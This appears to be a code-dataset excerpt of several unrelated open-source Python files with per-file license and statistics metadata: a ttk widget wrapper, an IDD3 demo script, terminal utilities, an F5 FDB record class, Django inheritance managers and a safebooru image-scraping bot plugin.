self.tk.call((self._w, "pane", pane) + self._options(kw)) class Progressbar(Widget): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::progressbar", cnf, kw) def step(self, amount=1.0): """Increments the -value by amount. amount defaults to 1.0 if omitted. """ return self.tk.call(self._w, "step", amount) def start(self): self.tk.call("ttk::progressbar::start", self._w) def stop(self): self.tk.call("ttk::progressbar::stop", self._w) class Radiobutton(Widget, Tkinter.Radiobutton): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::radiobutton", cnf, kw) class Scrollbar(Widget, Tkinter.Scrollbar): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::scrollbar", cnf, kw) class Separator(Widget): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::separator", cnf, kw) class Treeview(Widget, Tkinter.Listbox): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, 'ttk::treeview', cnf, kw) def children(self, item, newchildren=None): """If newchildren is not specified, returns the list of children belonging to item. If newchildren is specified, replaces item's child list with newchildren. Items in the old child list not present in the new child list are detached from the tree. None of the items in newchildren may be an ancestor of item. 
""" return self.tk.call(self._w, "children", item, newchildren) def column(self, column, **kw): """Query or modify the options for the specified column. If no options are specified, returns a dictionary of option/value pairs. If a single option is specified, returns the value of that option. Otherwise, the options are updated with the specified values. The following options may be set on each column: -id name The column name. This is a read-only option. For example, [$pathname column #n -id] returns the data column associated with data column #n. -anchor Specifies how the text in this column should be aligned with respect to the cell. One of n, ne, e, se, s, sw, w, nw, or center. -width w The width of the column in pixels. Default is something reasonable, probably 200 or so. """ pass def delete(self, items): """Deletes each of the items and all of their descendants. The root item may not be deleted. See also: detach. """ return self.tk.call(self._w, "delete", items) def detach(self, items): """Unlinks all of the specified items from the tree. The items and all of their descendants are still present and may be reinserted at another point in the tree but will not be displayed. The root item may not be detached. See also: delete. """ return self.tk.call(self._w, "detach", items) def exists(self, item): """Returns 1 if the specified item is present in the tree, 0 otherwise. """ return self.tk.call(self._w, "exists", item) def focus(self, item=None): """If item is specified, sets the focus item to item. Otherwise, returns the current focus item, or {} if there is none. """ return self.tk.call(self._w, "focus", item) def heading(self, column, **kw): """Query or modify the heading options for the specified column. Valid options are: -text text The text to display in the column heading. -image imageName Specifies an image to display to the right of the column heading. -command script A script to evaluate when the heading label is pressed. """ pass def identify(self, x, y): """Returns a description of the widget component under the point given by x and y. The return value is a list with one of the following forms: heading #n The column heading for display column #n. separator #n The border to the right of display column #n. cell itemid #n The data value for item itemid in display column #n. item itemid element The tree label for item itemid; element is one of text, image, or indicator, or another element name depending on the style. row itemid The y position is over the item but x does not identify any element or displayed data value. nothing The coordinates are not over any identifiable object. See COLUMN IDENTIFIERS for a discussion of display columns and data columns. """ pass def index(self, item): """Returns the integer index of item within its parent's list of children. """ pass def insert(self, parent, index, id=None, **kw): """Creates a new item. parent is the item ID of the parent item, or the empty string {} to create a new top-level item. index is an integer, or the value end, specifying where in the list of parent's children to insert the new item. If index is less than or equal to zero, the new node is inserted at the beginning; if index is greater than or equal to the current number of children, it is inserted at the end. If -id is specified, it is used as the item identifier; id must not already exist in the tree. Otherwise, a new unique identifier is generated. returns the item identifier of the newly created item. See ITEM OPTIONS for the list of available options. 
""" pass def item(item, **kw): """Query or modify the options for the specified item. If no -option is specified, returns a dictionary of option/value pairs. If a single -option is specified, returns the value of that option. Otherwise, the item's options are updated with the specified values. See ITEM OPTIONS for the list of available options. """ pass def move(self, item, parent, index): """Moves item to position index in parent's list of children. It is illegal to move an item under one of its descendants. If index is less than or equal to zero, item is moved to the beginning; if greater than or equal to the number of children, it's moved to the end. """ pass def next(self, item): """Returns the identifier of item's next sibling, or {} if item is the last child of its parent. """ pass def parent(self, item): """Returns the ID of the parent of item, or {} if item is at the top level of the hierarchy. """ pass def prev(self, item): """Returns the identifier of item's previous sibling, or {} if item is the first child of its parent. """ pass def selection(self): """Returns the list of selected items""" pass def selection_set(self, items): """items becomes the new selection. """ pass def selection_add(self, items): """Add items to the selection """ pass def selection_remove(self, items): """Remove items from the selection """ pass def selection_toggle(self, items): """Toggle the selection state of each item in items. """ pass def set(self, item, column, value=None): """If value is specified, sets the value of column column in item item, otherwise returns the current value. See COLUMN IDENTIFIERS. """ pass else: print "GUI: tcl/tk version is older than 8.5; using simple back-up widgets." # In the future, could add more fake tile widgets (or handle more methods of # existing ones) if required. class FakeCombobox(Tkinter.OptionMenu): def __init__(self, master=None, textvariable=None,values=None,state=None,**kw): # missing state=readonly # missing current() Tkinter.OptionMenu.__init__(self,master,textvariable,*values) Combobox = FakeCombobox class FakeProgressbar(Tkinter.Frame): def __init__(self,master=None,cnf={},**kw): Tkinter.Frame.__init__(self,master) def step(self,amount=1.0): pass def start(self): pass def stop(self): pass Progressbar = FakeProgressbar # CB: tix has Notebook, Combobox, and Meter, but I wouldn't # want to rely on Tix being present (even though it is # supposed to be part of Python's standard library).
bsd-3-clause
419,085,562,894,774,600
34.977368
93
0.506839
false
4.092743
false
false
false
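Editor's note (not part of the dataset row above): the preceding record bundles an ordered-dictionary implementation whose keys, values, and items attributes are callable sequence views, plus a thin Tkinter "Tile" wrapper layer with plain-Tkinter fallbacks for tcl/tk older than 8.5. Below is a minimal usage sketch for SequenceOrderedDict distilled from the record's own doctests; the `odict` import path is an assumption (the dump does not record the module name), and the code targets Python 2, as the use of types.SliceType and cmp implies.

from odict import SequenceOrderedDict   # hypothetical import path for the module above

d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
print d.keys()      # [1, 2, 3] -- callable like the normal dict method...
print d.keys[:]     # [1, 2, 3] -- ...and indexable like a list
d.keys = [3, 1, 2]  # reassigning the view reorders the dict in place
print d.items[0]    # (3, 4)
d.values.sort()     # sorts the values and writes them back onto the existing keys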
andrecunha/idd3
examine.py
1
2041
# -*- coding: utf-8 -*- # IDD3 - Propositional Idea Density from Dependency Trees # Copyright (C) 2014-2015 Andre Luiz Verucci da Cunha # # This program is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the Free # Software Foundation, either version 3 of the License, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for # more details. # # You should have received a copy of the GNU General Public License along with # this program. If not, see <http://www.gnu.org/licenses/>. from __future__ import print_function, unicode_literals, division import pprint import idd3 from idd3 import Relation, Engine from idd3.rules import en import nltk from sys import argv import logging logging.basicConfig(level=logging.DEBUG) try: from termcolor import colored except ImportError: def colored(string, color, attrs): return string def demo(): idd3.use_language(en) graphs = nltk.parse.dependencygraph.DependencyGraph.load(argv[1]) index = int(argv[2]) - 1 engine = Engine(idd3.all_rulesets, idd3.all_transformations) relations = [] for relation in graphs[index].nodelist: relations.append(Relation(**relation)) print(colored('Sentence %d:' % (index + 1), 'white', attrs=['bold'])) pprint.pprint(relations) print(colored('Propositions:', 'white', attrs=['bold'])) engine.analyze(relations) for i, prop in enumerate(engine.props): print(str(i + 1) + ' ' + str(prop)) print(colored('Unprocessed relations:', 'white', attrs=['bold'])) for relation in engine.get_unprocessed_relations(relations): print(relation) if __name__ == '__main__': if len(argv) != 3: print('Usage: python', argv[0], '<conll file>', '<index>') else: demo()
gpl-3.0
3,371,991,498,734,300,700
30.890625
78
0.696227
false
3.751838
false
false
false
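Editor's note: examine.py above is a command-line demo for IDD3 that prints one parsed sentence's relations, the propositions extracted from them, and any relations left unprocessed. A hedged invocation sketch follows; corpus.conll is a placeholder file name, and the programmatic part assumes idd3 and nltk are installed.

# Shell usage, exactly as the script's own usage message describes:
#   python examine.py corpus.conll 3
#
# Rough programmatic equivalent, mirroring the demo() function above
# (`graph` would be one nltk DependencyGraph loaded from the CoNLL file):
import idd3
from idd3 import Relation, Engine
from idd3.rules import en

idd3.use_language(en)
engine = Engine(idd3.all_rulesets, idd3.all_transformations)
# relations = [Relation(**node) for node in graph.nodelist]
# engine.analyze(relations)
# for i, prop in enumerate(engine.props):
#     print(str(i + 1) + ' ' + str(prop))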
JMSwag/jms-utils
jms_utils/terminal.py
1
8327
# -------------------------------------------------------------------------- # The MIT License (MIT) # # Copyright (c) 2014-2016 Digital Sapphire # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # -------------------------------------------------------------------------- from __future__ import print_function import logging try: import msvcrt except ImportError: msvcrt = None import locale import optparse import os import platform import shlex import struct import subprocess import sys try: import termios except ImportError: termios = None try: import tty except ImportError: tty = None import six log = logging.getLogger(__name__) def print_to_console(text): enc = locale.getdefaultlocale()[1] or "utf-8" try: print(text.encode(enc, errors="backslashreplace")) except (LookupError, UnicodeEncodeError): # Unknown encoding or encoding problem. Fallback to ascii print(text.encode("ascii", errors="backslashreplace")) def terminal_formatter(): max_width = 80 max_help_position = 80 # No need to wrap help messages if we're on a wide console columns = get_terminal_size()[0] if columns: max_width = columns fmt = optparse.IndentedHelpFormatter(width=max_width, max_help_position=max_help_position) return fmt # get width and height of console # works on linux, os x, windows, cygwin(windows) # originally retrieved from: # http://stackoverflow.com/questions/ # 566746/how-to-get-console-window-width-in-python def get_terminal_size(): current_os = platform.system() tuple_xy = None if current_os == u'Windows': tuple_xy = _get_terminal_size_windows() if tuple_xy is None: tuple_xy = _get_terminal_size_tput() # needed for window's python in cygwin's xterm! 
if current_os in [u'Linux', u'Darwin'] or current_os.startswith('CYGWIN'): tuple_xy = _get_terminal_size_linux() if tuple_xy is None: log.debug(u"default") tuple_xy = (80, 25) # default value return tuple_xy def _get_terminal_size_windows(): try: from ctypes import windll, create_string_buffer # stdin handle is -10 # stdout handle is -11 # stderr handle is -12 h = windll.kernel32.GetStdHandle(-12) csbi = create_string_buffer(22) res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) if res: (bufx, bufy, curx, cury, wattr, left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) sizex = right - left + 1 sizey = bottom - top + 1 return sizex, sizey except: pass def _get_terminal_size_tput(): # get terminal width # http://stackoverflow.com/questions/263890/ # how-do-i-find-the-width-height-of-a-terminal-window try: cols = int(subprocess.check_call(shlex.split('tput cols'))) rows = int(subprocess.check_call(shlex.split('tput lines'))) return (cols, rows) except: pass def _get_terminal_size_linux(): def ioctl_GWINSZ(fd): try: import fcntl # Is this required # import termios cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234')) return cr except: pass cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) if not cr: try: fd = os.open(os.ctermid(), os.O_RDONLY) cr = ioctl_GWINSZ(fd) os.close(fd) except: pass if not cr: try: cr = (os.environ['LINES'], os.environ['COLUMNS']) except: return None return int(cr[1]), int(cr[0]) # Gets a single character form standard input. Does not echo to the screen class GetCh: def __init__(self): if sys.platform == u'win32': self.impl = _GetchWindows() else: self.impl = _GetchUnix() def __call__(self): return self.impl() class _GetchUnix: def __init__(self): pass def __call__(self): pass fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch class _GetchWindows: def __init__(self): pass def __call__(self): return msvcrt.getch() def ask_yes_no(question, default='no', answer=None): u"""Will ask a question and keeps prompting until answered. Args: question (str): Question to ask end user default (str): Default answer if user just press enter at prompt answer (str): Used for testing Returns: (bool) Meaning: True - Answer is yes False - Answer is no """ default = default.lower() yes = [u'yes', u'ye', u'y'] no = [u'no', u'n'] if default in no: help_ = u'[N/y]?' default = False else: default = True help_ = u'[Y/n]?' 
while 1: display = question + '\n' + help_ if answer is None: log.debug(u'Under None') answer = six.moves.input(display) answer = answer.lower() if answer == u'': log.debug(u'Under blank') return default if answer in yes: log.debug(u'Must be true') return True elif answer in no: log.debug(u'Must be false') return False else: sys.stdout.write(u'Please answer yes or no only!\n\n') sys.stdout.flush() answer = None six.moves.input(u'Press enter to continue') sys.stdout.write('\n\n\n\n\n') sys.stdout.flush() def get_correct_answer(question, default=None, required=False, answer=None, is_answer_correct=None): u"""Ask user a question and confirm answer Args: question (str): Question to ask user default (str): Default answer if no input from user required (str): Require user to input answer answer (str): Used for testing is_answer_correct (str): Used for testing """ while 1: if default is None: msg = u' - No Default Available' else: msg = (u'\n[DEFAULT] -> {}\nPress Enter To ' u'Use Default'.format(default)) prompt = question + msg + u'\n--> ' if answer is None: answer = six.moves.input(prompt) if answer == '' and required and default is not None: print(u'You have to enter a value\n\n') six.moves.input(u'Press enter to continue') print(u'\n\n') answer = None continue if answer == u'' and default is not None: answer = default _ans = ask_yes_no(u'You entered {}, is this ' u'correct?'.format(answer), answer=is_answer_correct) if _ans: return answer else: answer = None
mit
-2,106,631,287,010,268,000
28.217544
79
0.578119
false
3.9976
false
false
false
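Editor's note: a short usage sketch for the helpers in jms_utils/terminal.py above. The import path mirrors the record's path field; the prompts and defaults are illustrative, and the `answer`/`is_answer_correct` keyword arguments shown in the source exist so tests can bypass interactive input.

from jms_utils.terminal import get_terminal_size, ask_yes_no, get_correct_answer

cols, rows = get_terminal_size()        # falls back to (80, 25) when detection fails
print('%d columns x %d rows' % (cols, rows))

# Both prompts keep asking until they get a usable answer.
if ask_yes_no('Proceed with the demo?', default='yes'):
    name = get_correct_answer('Project name?', default='demo')
    print('using %s' % name)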
f5devcentral/f5-cccl
f5_cccl/resource/net/fdb/record.py
1
1541
"""Provides a class for managing BIG-IP FDB tunnel record resources.""" # coding=utf-8 # # Copyright (c) 2017-2021 F5 Networks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import logging from f5_cccl.resource import Resource from f5_cccl.utils.route_domain import normalize_address_with_route_domain LOGGER = logging.getLogger(__name__) class Record(Resource): """Record class for managing network configuration on BIG-IP.""" properties = dict(name=None, endpoint=None) def __init__(self, name, default_route_domain, **data): """Create a record from CCCL recordType.""" super(Record, self).__init__(name, partition=None) endpoint = data.get('endpoint', None) self._data['endpoint'] = normalize_address_with_route_domain( endpoint, default_route_domain)[0] def __eq__(self, other): if not isinstance(other, Record): return False return super(Record, self).__eq__(other) def _uri_path(self, bigip): raise NotImplementedError
apache-2.0
8,939,869,457,900,549,000
32.5
74
0.69695
false
3.992228
false
false
false
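Editor's note: a minimal construction sketch for the FDB tunnel Record above. The MAC-style name, route domain, and endpoint are placeholders; the class leaves _uri_path unimplemented, so on its own it serves comparison and bookkeeping rather than direct BIG-IP access.

from f5_cccl.resource.net.fdb.record import Record

rec = Record('12:ab:34:cd:56:ef', default_route_domain=0, endpoint='10.244.1.5')
# The endpoint is normalised with the default route domain at construction time;
# equality is type-checked here and otherwise delegated to the Resource base class.
other = Record('12:ab:34:cd:56:ef', default_route_domain=0, endpoint='10.244.1.5')
print(rec == other)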
emilkjer/django-model-utils
model_utils/managers.py
1
8414
from types import ClassType import warnings from django.contrib.contenttypes.models import ContentType from django.db import models from django.db.models.fields.related import OneToOneField from django.db.models.manager import Manager from django.db.models.query import QuerySet import django class InheritanceQuerySet(QuerySet): def select_subclasses(self, *subclasses): if not subclasses: subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects() if isinstance(rel.field, OneToOneField) and issubclass(rel.field.model, self.model)] new_qs = self.select_related(*subclasses) new_qs.subclasses = subclasses return new_qs def _clone(self, klass=None, setup=False, **kwargs): for name in ['subclasses', '_annotated']: if hasattr(self, name): kwargs[name] = getattr(self, name) return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs) def annotate(self, *args, **kwargs): qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs) qset._annotated = [a.default_alias for a in args] + kwargs.keys() return qset def get_subclass(self, obj): """ FIX see https://bitbucket.org/carljm/django-model-utils/pull-request/5/patch-to-issue-16/diff and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses """ def get_attribute(obj, s): try: return getattr(obj,s, False) except obj.__class__.DoesNotExist: return False if django.VERSION[0:2] < (1, 5): sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj] else: sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj] return sub_obj[0] def iterator(self): iter = super(InheritanceQuerySet, self).iterator() if getattr(self, 'subclasses', False): for obj in iter: sub_obj = self.get_subclass(obj) if getattr(self, '_annotated', False): for k in self._annotated: setattr(sub_obj, k, getattr(obj, k)) yield sub_obj else: for obj in iter: yield obj class InheritanceManager(models.Manager): use_for_related_fields = True def get_query_set(self): return InheritanceQuerySet(self.model) def select_subclasses(self, *subclasses): return self.get_query_set().select_subclasses(*subclasses) def get_subclass(self, *args, **kwargs): return self.get_query_set().select_subclasses().get(*args, **kwargs) class InheritanceCastMixin(object): def cast(self): results = tuple(self.values_list('pk', 'real_type')) type_to_pks = {} for pk, real_type_id in results: type_to_pks.setdefault(real_type_id, []).append(pk) content_types = ContentType.objects.in_bulk(type_to_pks.keys()) pk_to_child = {} for real_type_id, pks in type_to_pks.iteritems(): content_type = content_types[real_type_id] child_type = content_type.model_class() children = child_type._default_manager.in_bulk(pks) for pk, child in children.iteritems(): pk_to_child[pk] = child children = [] # sort children into same order as parents where returned for pk, real_type_id in results: children.append(pk_to_child[pk]) return children class QueryManager(models.Manager): def __init__(self, *args, **kwargs): if args: self._q = args[0] else: self._q = models.Q(**kwargs) super(QueryManager, self).__init__() def order_by(self, *args): self._order_by = args return self def get_query_set(self): qs = super(QueryManager, self).get_query_set().filter(self._q) if hasattr(self, '_order_by'): return qs.order_by(*self._order_by) return qs class PassThroughManager(models.Manager): """ Inherit from this Manager to enable you to call any methods from your custom QuerySet class from your manager. 
Simply define your QuerySet class, and return an instance of it from your manager's `get_query_set` method. Alternately, if you don't need any extra methods on your manager that aren't on your QuerySet, then just pass your QuerySet class to the ``for_queryset_class`` class method. class PostQuerySet(QuerySet): def enabled(self): return self.filter(disabled=False) class Post(models.Model): objects = PassThroughManager.for_queryset_class(PostQuerySet)() """ # pickling causes recursion errors _deny_methods = ['__getstate__', '__setstate__', '_db'] def __init__(self, queryset_cls=None): self._queryset_cls = queryset_cls super(PassThroughManager, self).__init__() def __getattr__(self, name): if name in self._deny_methods: raise AttributeError(name) return getattr(self.get_query_set(), name) def get_query_set(self): if self._queryset_cls is not None: kargs = {'model': self.model} if hasattr(self, '_db'): kargs['using'] = self._db return self._queryset_cls(**kargs) return super(PassThroughManager, self).get_query_set() @classmethod def for_queryset_class(cls, queryset_cls): class _PassThroughManager(cls): def __init__(self): return super(_PassThroughManager, self).__init__() def get_query_set(self): kwargs = {} if hasattr(self, "_db"): kwargs["using"] = self._db return queryset_cls(self.model, **kwargs) return _PassThroughManager def manager_from(*mixins, **kwds): """ Returns a Manager instance with extra methods, also available and chainable on generated querysets. (By George Sakkis, originally posted at http://djangosnippets.org/snippets/2117/) :param mixins: Each ``mixin`` can be either a class or a function. The generated manager and associated queryset subclasses extend the mixin classes and include the mixin functions (as methods). :keyword queryset_cls: The base queryset class to extend from (``django.db.models.query.QuerySet`` by default). :keyword manager_cls: The base manager class to extend from (``django.db.models.manager.Manager`` by default). """ warnings.warn( "manager_from is pending deprecation; use PassThroughManager instead.", PendingDeprecationWarning, stacklevel=2) # collect separately the mixin classes and methods bases = [kwds.get('queryset_cls', QuerySet)] methods = {} for mixin in mixins: if isinstance(mixin, (ClassType, type)): bases.append(mixin) else: try: methods[mixin.__name__] = mixin except AttributeError: raise TypeError('Mixin must be class or function, not %s' % mixin.__class__) # create the QuerySet subclass id = hash(mixins + tuple(kwds.iteritems())) new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods) # create the Manager subclass bases[0] = manager_cls = kwds.get('manager_cls', Manager) new_manager_cls = type('Manager_%d' % id, tuple(bases), methods) # and finally override new manager's get_query_set super_get_query_set = manager_cls.get_query_set def get_query_set(self): # first honor the super manager's get_query_set qs = super_get_query_set(self) # and then try to bless the returned queryset by reassigning it to the # newly created Queryset class, though this may not be feasible if not issubclass(new_queryset_cls, qs.__class__): raise TypeError('QuerySet subclass conflict: cannot determine a ' 'unique class for queryset instance') qs.__class__ = new_queryset_cls return qs new_manager_cls.get_query_set = get_query_set return new_manager_cls()
bsd-3-clause
8,724,807,216,674,744,000
36.395556
103
0.611719
false
4.114425
false
false
false
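Editor's note: a usage sketch for the managers defined above, aimed at the Django 1.x series this module targets. The models are illustrative and assume a configured Django project; the PostQuerySet pattern is taken directly from the PassThroughManager docstring.

from django.db import models
from django.db.models.query import QuerySet
from model_utils.managers import InheritanceManager, PassThroughManager

class Place(models.Model):
    objects = InheritanceManager()

class Restaurant(Place):
    serves_pizza = models.BooleanField(default=True)

class PostQuerySet(QuerySet):
    def enabled(self):
        return self.filter(disabled=False)

class Post(models.Model):
    disabled = models.BooleanField(default=False)
    objects = PassThroughManager.for_queryset_class(PostQuerySet)()

# Place.objects.select_subclasses() returns Restaurant instances where a row has one;
# Post.objects.enabled() reaches the custom queryset method through the manager.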
ace3df/ImageTweet
plugins/safebooru.py
1
9578
# -*- coding: utf-8 -*- import random import time import sys import os import re sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))) import utils def delete_image(image): import time time.sleep(10) os.remove(image) def tag_clean(tag_html): text = tag_html.text text = text.rstrip('1234567890.') text = text.replace("&#39;", "\'").strip() return text def get_image_online(**kwargs): if kwargs.get('used images'): txt_name = kwargs.get('used images') used_links = open(txt_name, 'r').read().splitlines() else: txt_name = os.path.join(os.getcwd(), "Used safebooru {0}.txt".format( kwargs['bot name'])) try: used_links = open(txt_name, 'r').read().splitlines() except: if not os.path.exists(txt_name): print("Didn't find any used links! Creating a TXT!") print("Set it to:\n{0}".format(txt_name)) used_links = [] else: used_links = open(txt_name, 'r').read().splitlines() if kwargs.get('highest page'): high_page = int(kwargs.get('highest page')) else: high_page = 50 tried_pages = [high_page] cookie_file = None try_count = 0 low_page = 0 page = 0 x = None no_images = False url_start = "http://safebooru.org" url_search = "http://safebooru.org/index.php?page=post&s=list&tags=" if utils.is_bool(kwargs.get('login')): cookie_file = "../safebooru.txt" url_login = url_start + "/index.php?page=account&s=login&code=00" form_num = 0 form_user = "user" form_password = "pass" username = kwargs.get('username') password = kwargs.get('password') if not os.path.exists(cookie_file): browser, s = utils.scrape_site(url_login, cookie_file, True) form = browser.get_form(form_num) form[form_user].value = username form[form_password].value = password browser.submit_form(form) s.cookies.save() if utils.is_bool(kwargs.get('save images')): if kwargs.get('path'): path = kwargs.get('path') else: path = os.path.abspath(os.path.join(os.getcwd(), "images")) if not os.path.exists(path): os.makedirs(path) else: path = os.path.abspath(os.path.join(os.getcwd())) if kwargs.get('tags'): if isinstance(kwargs.get('tags'), list): tags = '+'.join(kwargs.get('tags')) else: tags = '+'.join(kwargs.get('tags').split(', ')) else: tags = "" if kwargs.get('ignore tags'): if isinstance(kwargs.get('ignore tags'), list): ignore_tags = kwargs.get('ignore tags') else: ignore_tags = kwargs.get('ignore tags').split(', ') else: ignore_tags = [] if utils.is_bool(kwargs.get('ignore cosplay')): ignore_cosplay = utils.is_bool(kwargs.get('ignore cosplay')) else: ignore_cosplay = False if utils.is_bool(kwargs.get('accept webm')): accept_webm = utils.is_bool(kwargs.get('accept webm')) else: accept_webm = False tried_pages = [high_page + 41] while True: while True: while True: while True: no_images = False try_count += 1 if try_count == 15: return False, False page = str(int(random.randint(low_page, high_page) * 40)) while int(page) in tried_pages: if int(page) == 0: break if not x: x = high_page page = str(int( random.randint(low_page, high_page) * 1)) if int(page) > int(x): continue tried_pages.append(int(page)) x = min(tried_pages) page_url = "&pid=" + str(page) url = "%s%s%s" % (url_search, tags, page_url) browser = utils.scrape_site(url, cookie_file) if browser.find('h1', text="Nothing found, try google? 
"): no_images = True elif len(browser.find_all('img')) < 3: no_images = True time.sleep(1) if not no_images: break elif no_images and int(page) == 0: return False, False good_image_links = [] image_links = browser.find_all('span', class_="thumb") for link in image_links: try: link['id'] except: continue link = str(link['id'])[1:] good_image_links.append(link) if good_image_links == []: return False, False random.shuffle(good_image_links) url = "%s/index.php?page=post&s=view&id=%s" % ( url_start, random.choice(good_image_links)) try_count = 0 while url in used_links: url = "%s/index.php?page=post&s=view&id=%s" % ( url_start, random.choice(good_image_links)) try_count = try_count + 1 if try_count == 20: break used_links.append(url) post_url = url browser.open(url) image_tags = [] char_tags = [] art_tags = [] sers_tags = [] tags_tags = [] site_tag = browser.find('ul', id="tag-sidebar") site_tag = site_tag.find_all('li') for taga in site_tag: tag = tag_clean(taga) if taga['class'][0] == "tag-type-artist": art_tags.append(tag.title()) elif taga['class'][0] == "tag-type-copyright": sers_tags.append(tag.title()) elif taga['class'][0] == "tag-type-character": char_tags.append(tag.title()) else: tags_tags.append(tag.title()) image_tags.append(tag.lower()) if any([item in [x.lower() for x in ignore_tags] for item in [x.lower() for x in image_tags]]): continue if ignore_cosplay: if any(" (cosplay)" in s for s in image_tags): continue break filename = "" if not utils.is_bool(kwargs.get('message')): message = "" try: url = browser.find( 'img', attrs={'id': 'image'})['src'].replace("\\\\", "\\") except: # Flash file continue sn_kwgs = {} sn_url, sn_kwgs = utils.saucenao(url, kwargs['saucenao api'], True) re_dict = {'{#artist}': ( '#' if art_tags else '') + ' #'.join( [x.replace(" ", "_") for x in art_tags]), '{#character}': ( '#' if char_tags else '') + ' #'.join( [x.replace(" ", "_") for x in char_tags]), '{#series}': ( '#' if sers_tags else '') + ' #'.join( [x.replace(" ", "_") for x in sers_tags]), '{#tags}': ( '#' if tags_tags else '') + ' #'.join( [x.replace(" ", "_") for x in tags_tags]), '{artist}': ', '.join(art_tags), '{character}': ', '.join(char_tags), '{series}': ', '.join(sers_tags), '{tags}': ', '.join(tags_tags), '{url}': post_url, '{sn title}': sn_kwgs.get('title'), '{sn illust id}': sn_kwgs.get('illust id'), '{sn illust url}': sn_url, '{sn artist}': sn_kwgs.get('artist'), '{sn artist id}': sn_kwgs.get('artist id'), '{sn artist url}': sn_kwgs.get('artist url')} if kwargs.get('filename'): filename = utils.replace_all(kwargs.get('filename'), re_dict) filename = utils.safe_msg(filename) if kwargs.get('message'): message = utils.replace_all(kwargs.get('message'), re_dict) message = utils.safe_msg(message) with open(txt_name, 'w') as f: f.write("\n".join(used_links)) tweet_image = utils.download_image(url, path, filename, **kwargs) if tweet_image: break if not utils.is_bool(kwargs.get('save images')): from threading import Thread Thread(name="Delete Image", target=delete_image, args=( tweet_image, )).start() return message, tweet_image def main(**kwargs): message, image = get_image_online(**kwargs) return(message, image)
mit
392,481,504,197,402,100
37.934959
79
0.448423
false
4.12667
false
false
false
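Editor's note: a hedged sketch of calling the safebooru plugin above. The keyword names ('bot name', 'tags', 'saucenao api', and so on) mirror the kwargs the function actually reads, but every value here is a placeholder, and the plugin additionally depends on the project's own utils module and on network access.

from plugins import safebooru

message, image_path = safebooru.main(**{
    'bot name': 'example-bot',            # names the "used links" text file
    'tags': ['solo', 'scenery'],          # joined with '+' into the search URL
    'ignore tags': ['comic'],
    'ignore cosplay': 'true',
    'save images': 'true',
    'saucenao api': 'YOUR-SAUCENAO-KEY',  # required: read directly from kwargs
    'message': '{artist} - {url}',        # template keys come from re_dict above
})
if image_path:
    print('%s -> %s' % (message, image_path))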